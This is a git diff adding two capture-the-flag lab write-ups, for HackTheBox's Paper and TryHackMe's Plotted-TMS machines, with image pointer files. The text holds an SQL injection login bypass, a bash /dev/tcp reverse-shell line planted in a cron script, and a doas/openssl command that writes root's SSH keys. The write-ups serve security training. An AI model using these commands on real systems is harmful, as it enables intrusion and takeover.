sha256:1ff7794509b22fc4106299f8821d75bc7562c60125d919e7278c55b01313cba4 +size 95519 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-12.webp b/content/writeup-ctf/writeup-paper-htb/img/image-12.webp new file mode 100644 index 0000000..c0d8e54 --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d053dfb820ce384596fb4f2c61501396fdc8346b9ed4321cdf78257a0fd8266c +size 83378 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-13.png b/content/writeup-ctf/writeup-paper-htb/img/image-13.png new file mode 100644 index 0000000..78953ba --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0ee023e85449a98942d9df0b34ef84c709f9786c8e524666a12c53cdefe930bb +size 45714 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-13.webp b/content/writeup-ctf/writeup-paper-htb/img/image-13.webp new file mode 100644 index 0000000..13a001b --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a8ff10020029679217d2f7fa94dfa83c2b3fc39f2fe1dcb2e74d457f9f42bedd +size 42540 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-2.png b/content/writeup-ctf/writeup-paper-htb/img/image-2.png new file mode 100644 index 0000000..7f90a15 --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a0e02f6a11c2407d3ed5273ec1669b84d1341a8fb7aced1ee8022203d37ba742 +size 38803 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-2.webp b/content/writeup-ctf/writeup-paper-htb/img/image-2.webp new file mode 100644 index 0000000..2ef50ec --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:feba75693796bd3fffbe0cbcf02bc367c8e8aec1c9dda2ce6d37c1090935917c +size 33866 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-3.png b/content/writeup-ctf/writeup-paper-htb/img/image-3.png new file mode 100644 index 0000000..4efa036 --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:367e58b5cc6b5c4fe4b30c9c4fc12118b7e2993575c0d1b5f2085c48452a068a +size 2496230 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-3.webp b/content/writeup-ctf/writeup-paper-htb/img/image-3.webp new file mode 100644 index 0000000..824f94b --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:905cbf0e23b39052f427de04950db7750ffb94f9b8f62e5b2294d9eb63a199a9 +size 342674 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-4.png b/content/writeup-ctf/writeup-paper-htb/img/image-4.png new file mode 100644 index 0000000..6d55ddf --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3c6a2cbdb55ee1125c11c773063a3ffb6599e31d1c08629e42202283b07e21fc +size 106235 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-4.webp b/content/writeup-ctf/writeup-paper-htb/img/image-4.webp new file mode 100644 index 0000000..9262a5a --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:323cff4b6014ad1428931edde191879e71a699a4c729bf00fd827a51af07b08a +size 90746 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-5.png b/content/writeup-ctf/writeup-paper-htb/img/image-5.png new file mode 100644 index 0000000..94dfd6e --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:505a61661046b3a56e31741896554e753069f1156720b2dfe632b7dca4065dfd +size 27863 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-5.webp b/content/writeup-ctf/writeup-paper-htb/img/image-5.webp new file mode 100644 index 0000000..02d700d --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3d7228c533f31b269eca8dbb7ac59cebdbc26c823c1fd6ce4eea794f83417003 +size 19464 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-6.png b/content/writeup-ctf/writeup-paper-htb/img/image-6.png new file mode 100644 index 0000000..ac4163f --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ab9c4ab221b5fac615ddc49b6a80e731ae973c36b35096779011a7c1031dca18 +size 36775 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-6.webp b/content/writeup-ctf/writeup-paper-htb/img/image-6.webp new file mode 100644 index 0000000..2bb81f5 --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f205b5b475df89c440f4f3dee2deef78b9f5189c73f54672d66d81bf29978b47 +size 24208 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-7.png b/content/writeup-ctf/writeup-paper-htb/img/image-7.png new file mode 100644 index 0000000..97ac91d --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8963f78953916d3a24adc5c9b0f5ec94c82e593e313ae4138df81f7593f53c23 +size 68605 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-7.webp b/content/writeup-ctf/writeup-paper-htb/img/image-7.webp new file mode 100644 index 0000000..d64aec1 --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:db3c3b181814d604be85c4f2cb8695cc003ba37a27eee209269cff1ce3936b1a +size 68020 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-8.png b/content/writeup-ctf/writeup-paper-htb/img/image-8.png new file mode 100644 index 0000000..5024fda --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2fa46b3a77b267b76fbd6017bd51adf042b72e1aa82671bfb950e37870606dd4 +size 30141 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-8.webp b/content/writeup-ctf/writeup-paper-htb/img/image-8.webp new file mode 100644 index 0000000..db57a1c --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2be003818fb2d537528c48016d961025363a6eb3d313aecd0ee983ee3b8d8783 +size 30974 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-9.png b/content/writeup-ctf/writeup-paper-htb/img/image-9.png new file mode 100644 index 0000000..506b2ec --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ab77f01814c1f43538984659370197ffc4f109548bb1a012923e50b61c27c772 +size 83566 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-9.webp b/content/writeup-ctf/writeup-paper-htb/img/image-9.webp new file mode 100644 index 0000000..9532934 --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3220e151af2d7280e5ca9ba45e564c489f510b32e2967d9a2c5d62c065cb8e0e +size 76426 diff --git a/content/writeup-ctf/writeup-paper-htb/index.md b/content/writeup-ctf/writeup-paper-htb/index.md new file mode 100644 index 0000000..55cadfd --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/index.md @@ -0,0 +1,140 @@ +--- +title: "Writeup - Paper (HTB)" +date: 2022-04-05 +slug: "writeup-paper-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Paper](https://app.hackthebox.com/machines/Paper) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.10.11.143 +``` +Three TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2p1) +- 80/tcp : HTTP web server (Apache 2.4.37) +- 443/tcp : HTTPS web server (Apache 2.4.37) + +After checking the site via a web browser nothing is displayed, let's make a Curl request to see what the server sends us as a response: + +![](img/image-2.webp) + +We can see that the server accepts requests with the domain "office.paper", let's add this domain in our hosts file: + + +```bash +10.10.11.143 office.paper +``` +![](img/image-3.webp) + +We can now access the site, now let's look for exploits ! + +## Exploit + +After inspecting the page, I notice that it is a site based on the CMS Wordpress, let's do a scan with "WPScan" to try to identify flaws: + +![](img/image-4.webp) + +After some research, I realize that the version of Worpress used is vulnerable to [CVE-2019-17671](https://www.exploit-db.com/exploits/47690). + +Overall this exploit allows unidentified people to see normally private content. To do this we add the querry "?static=1" to the link of the site. This gives us access to a page with the following content: + + +``` + http://office.paper/?static=1 + + test + +Micheal please remove the secret from drafts for gods sake! + +Hello employees of Blunder Tiffin, + +Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system. + +So, I kindly request you all to take your discussions from the public blog to a more private chat system. + +-Nick + +# Warning for Michael + +Michael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -Nick + +Threat Level Midnight + +A MOTION PICTURE SCREENPLAY, +WRITTEN AND DIRECTED BY +MICHAEL SCOTT + +[INT:DAY] + +Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt…. + +# Secret Registration URL of new Employee chat system + +http://chat.office.paper/register/8qozr226AhkCHZdyY + +# I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick. + +# Also, stop looking at my drafts. Jeez! +``` +In this text one thing interests us the link "chat.office.paper", indeed it is a link allowing to register on an exchange platform used by the company having the site. I add the domain in my "hosts" file then I click on the link to create an account: + +![](img/image-5.webp) + +My account gives me access to several elements and in particular has a conversation with the various employees of the company. In this discussion we learn that dwight has created a bot that can interact with files. I start a private conversation with this bot and test some commands: + +![](img/image-6.webp) + +The output of the "listing" query is the same as for the "ls -l" command, interesting would it be possible to add a command afterwards so that the program interprets it? Unfortunately not, the bot detects the attempt as command injection and blocks it. No luck, let's try something else. + +Let's try to list another folder, for example the parent folder : + +![](img/image-7.webp) + +Bingo, we have the list of files from the parent folder to "dirty". I notice that a folder has the name of the bot, it must be its source code. In this folder we find a file ".env". This kind of folder contains environment variables and possibly crendential. + +![](img/image-8.webp) + +And yes, it does contain credentials! Let's try to use them to connect via SSH. No luck it doesn't work with the user "recyclops", but we know that it is "dwight" who created the bot, could he have used the same password for his account and the bot : let's try : + +![](img/image-9.webp) + +It works, we now have an SSH session with the user "dwight" and access to the first flag. + +## Privilege escalation + +I start by using the [linPeas](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) script to have a first list of exploits. For that I upload the file, I add the execution rights and I launch it: + +![](img/image-10.webp) + +After some analysis of the script result, I find that the machine is vulnerable to CVE-2021-3560. + +![](img/image-11.webp) + +Quickly I find this [script](https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation) which allows the exploitation and the creation of a root session. Unfortunately, after several tries, the script does not work. + +![](img/image-12.webp) + +Let's try another [script](https://github.com/Almorabea/Polkit-exploit) : + +![](img/image-13.webp) + +This time it works and create me a root session, I now have control of the machine and can recover the root flag. + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Update wordpress plugins +- Restricted access to the bot +- Do not leave credencials in an accessible file +- Generate unique credencials when creating a bot +- Upgrade linux to avoid old CVEs diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/featured.png b/content/writeup-ctf/writeup-plotted-tms-thm/featured.png new file mode 100644 index 0000000..5341cd4 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7c3a6bcefb12a891b4a21d25997d0960f184e1872bb6b73797f9bfbcb557ad3 +size 1785218 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/featured.webp b/content/writeup-ctf/writeup-plotted-tms-thm/featured.webp new file mode 100644 index 0000000..efca1da --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:50ba94222a8a082a52f10c3d4c07665389181450c13e1b25a0c5f068535139b1 +size 1975792 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-1.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-1.png new file mode 100644 index 0000000..a8cb422 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ffd30c97daa1a4f73e3946cb146ac854ed2352cb15d0c65649370d82d9ac12b5 +size 39447 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-1.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-1.webp new file mode 100644 index 0000000..1948829 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:262af0e573814ed86333702d2d49f3baaf0e61abac0c112d128ef024262f1ed5 +size 39904 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-10.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-10.png new file mode 100644 index 0000000..49d349e --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:361f69579143e453f97cc4dba3512ac682995e5df90ceed16a6b6926a9cd94c6 +size 4377 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-10.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-10.webp new file mode 100644 index 0000000..f6e0103 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5611b0b7826f69fa61f820944bc944d4b13b123b252f16082d5b8e247676a879 +size 7250 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-11.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-11.png new file mode 100644 index 0000000..48a03f2 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e2069dbb266b0fa0c166435a065270b06e1bb95b615a046d6e5564486874d116 +size 56346 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-11.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-11.webp new file mode 100644 index 0000000..69fc4ca --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bc8c8321bf432a5f77663bbea82634e98a9b884c80694af5be3d7622eca619bc +size 57872 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-2.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-2.png new file mode 100644 index 0000000..496f9c8 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:67ab94c4cd31a4c4e434c35a3b19f22fc402c8c133a84145852f967659fbe830 +size 58485 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-2.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-2.webp new file mode 100644 index 0000000..8c18e11 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:33e5a95ad01bd6c148cff1059ce0a1b32ee6cbd8caf3e7a8afdea1b6483e1cb5 +size 55894 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-3.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-3.png new file mode 100644 index 0000000..e263a14 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf8911cec2a1d04f9eeb89f477606b92141402cccc0c2943843c7819aa169066 +size 295536 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-3.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-3.webp new file mode 100644 index 0000000..2106317 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0612ea33b2f6a4aef315b6daa591b27d8b69660b6f258d479a6b6e710075fc05 +size 45986 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-4.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-4.png new file mode 100644 index 0000000..e412c2a --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9eea17bedb3dcb47323b4f1832bb63e4fa49f1fb83ecb0a1ba39a3511c456c0d +size 59817 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-4.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-4.webp new file mode 100644 index 0000000..cb14617 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0b6f9a13e13f05f98ff1df369e86e2c186369ccbc343529879f54f7fd12445a9 +size 30470 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-5.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-5.png new file mode 100644 index 0000000..07720bc --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a1aee28c30bf9cd2d5c125303402877cb58f0e632a55980d1cca542b248ca693 +size 29655 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-5.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-5.webp new file mode 100644 index 0000000..246e74d --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1b045f0c5ace374be09b3e594fce4cda809693a20180c4c4c4bbb511992338bc +size 9582 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-6.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-6.png new file mode 100644 index 0000000..37d9689 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6979ef1781496969bd2e39fcab2c8d7c805a3ed9e0484356b3ece74968854e52 +size 28550 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-6.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-6.webp new file mode 100644 index 0000000..cdf0e33 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:813f3c43c3ec797aa7649437b0b02c306bb61b1d3f36e81a1343061e86194d25 +size 25778 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-7.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-7.png new file mode 100644 index 0000000..df314ba --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dcdbd5727bcbf56a145ff5f83cd6c20b3d96e40f22faa6dba99837aa6838be59 +size 19464 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-7.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-7.webp new file mode 100644 index 0000000..43de3d4 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ab3e4ebaa88582b526afd1d1410f7e9cec6faa93b2d931ee59f179bba79ae788 +size 34576 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-8.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-8.png new file mode 100644 index 0000000..35b92b8 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3b65b05d6bb3622a66c585479ecc1ab7ac5b29f950b8e9ab87f3e3b76d8fa6d7 +size 7925 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-8.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-8.webp new file mode 100644 index 0000000..d1bf998 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f4804f06e65fa802bd249fcf7245fd3fb3c5eae0425347ad3a0dcc6836e7f561 +size 8794 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-9.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-9.png new file mode 100644 index 0000000..4bcb3f8 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6a25617f80d6432ab69532b2ea59f5e4e9c73aaa89eb0c18f45a96ef4f9c32d7 +size 17943 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-9.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-9.webp new file mode 100644 index 0000000..854ab70 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:75736c62670dd4a98bdebc0ec77c420bdf7a35f7071e87290bc73a9af0f24c5e +size 18450 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/index.md b/content/writeup-ctf/writeup-plotted-tms-thm/index.md new file mode 100644 index 0000000..9ea28a2 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/index.md @@ -0,0 +1,117 @@ +--- +title: "Writeup - Plotted-TMS (THM)" +date: 2022-03-31 +slug: "writeup-plotted-tms-thm" +type: "writeup-ctf" +--- + +This is a writeup for the [Plotted-TMS](https://tryhackme.com/room/plottedtms) machine from the TryHackMe site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.173.55 +``` +Three TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2) +- 80/tcp : HTTP web server (Apache 2.4.41) +- 445/tcp : HTTP web server (Apache 2.4.41) + +## Exploit + +I start by listing the directories of the site hosted on port 445: + +![](img/image-2.webp) + +We find a `management` page that gives us access to an admin login page. + +![](img/image-3.webp) + +After a few injection tests I finally managed to connect with the following injection: + + +```bash +Username = ' or 1=1;-- - +``` +I now have access to the admin panel of the site. + +![](img/image-4.webp) + +In this panel I find the `Settings` page. This page allows to change the font image of the home page of the site. So I try to send a PHP reverse shell. + +![](img/image-5.webp) + +Then I access it via the following address: + + +```bash +http://10.10.173.55:445/management/uploads/ +``` +I now have a reverse shell with the user `www-data`. + +![](img/image-6.webp) + +After some research I find that the first flag is in the personal folder of the user `plot_admin`, problem I do not have the right to read it. So I will have to find a way to change the user. + +![](img/image-7.webp) + +After launching [linPeas](https://linpeas.sh) on the machine I find that every minute a script backup.sh is launched by the user `plot_admin`. + +![](img/image-8.webp) + +I don't have the permissions to change the content of the script, but I have the permissions to change the content of the `/var/www/scripts` folder. So I will be able to replace the current script, by a custom script allowing me to have a reverse shell as `plot_admin`. + +To do this I use the following commands: + + +```bash +mv backup.sh tmp +touch backup.sh +echo "bash -c '/bin/bash -i >& /dev/tcp/10.8.3.186/2345 0>&1'" > backup.sh +chmod +x backup.sh +``` +![](img/image-9.webp) + +I now have a reverse shell with the user `plot_admin` and I can get the first flag. + +## Privilege escalation + +I start by listing the SUID files with the following command: + + +```bash +find / -perm -u=s -type f 2>/dev/null +``` +I found a command not very common: [doas](https://man.openbsd.org/doas). This command is an alternative to the `sudo` command. After some research I find on this [site](https://book.hacktricks.xyz/linux-unix/privilege-escalation#doas) that the config file of this command is at the following address: `/etc/doas.conf`. + +![](img/image-10.webp) + +I find that my user can execute the `openssl` command with admin rights. So I'm looking on [GTFOBins](https://gtfobins.github.io/gtfobins/openssl/) for exploits related to this command. + +I find that it is possible to write in files, so I will be able to add to ssh key in the `authorized_keys` file and then connect via SSH to the root account. + +To do this I use the following commands: + + +```bash +FILE=/root/.ssh/authorized_keys +echo "ssh-rsa [key] kali@kali" | doas openssl enc -out "$FILE" +``` +![](img/image-11.webp) + +I now have a shell `root` shell and can retrieve the last flag. + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Fix the site code to avoid SQL injections ([OWASP SQL Injection](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)) +- Implement code detection in the admin panel image uploads +- Store CRON scripts in a folder accessible only by the author +- Do not allow root rights on commands that do not require it diff --git a/content/writeup-ctf/writeup-previse-htb/featured.png b/content/writeup-ctf/writeup-previse-htb/featured.png new file mode 100644 index 0000000..55ff4ed --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5c7352dd4b88cafda0263d83a267b3c8fcabe868bb3b119ddaa9929d37b2154a +size 402314 diff --git a/content/writeup-ctf/writeup-previse-htb/featured.webp b/content/writeup-ctf/writeup-previse-htb/featured.webp new file mode 100644 index 0000000..527a5ce --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:edf6dba08a8c6f1f848d68b90929352c1c5d5c73f4e5eba12c3801ed592035a9 +size 33118 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-1.png b/content/writeup-ctf/writeup-previse-htb/img/image-1.png new file mode 100644 index 0000000..0a660a4 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e8b5f2dcb01d7a68a8c9cd1164a23b23440e99041982a9a294706a3cdf6a92c4 +size 36260 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-1.webp b/content/writeup-ctf/writeup-previse-htb/img/image-1.webp new file mode 100644 index 0000000..b159b67 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:16184b614c14e29e189e3dcc95d87ffc39726b433c76fb1d23b462ebfb6c6e72 +size 31370 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-10.png b/content/writeup-ctf/writeup-previse-htb/img/image-10.png new file mode 100644 index 0000000..427430b --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f926dee60d601f5ba365c401d760489b80cd05b9620942161cd88f76c11524c1 +size 26805 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-10.webp b/content/writeup-ctf/writeup-previse-htb/img/image-10.webp new file mode 100644 index 0000000..5413102 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a5618c4cf4deda43e0cf7db49354c15aa5c3e733f80da30136d4ba64c5fc3ae0 +size 32232 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-11.png b/content/writeup-ctf/writeup-previse-htb/img/image-11.png new file mode 100644 index 0000000..908b07a --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8d7f9bd33e5f2e407ca27f7423d3ee0a83feefb107f8539b6a6a44eefddd8b11 +size 16351 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-11.webp b/content/writeup-ctf/writeup-previse-htb/img/image-11.webp new file mode 100644 index 0000000..1a207a1 --- /dev/null +++ b/content/writeup-ctf/writeup-previse-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:01b349989d1cf7511d36086e6558d193ae45791d6a130d26702a27d3464c2f54 +size 14464 diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-12.png b/content/writeup-ctf/writeup-previse-htb/img/image-12.png new file mode 100644 index 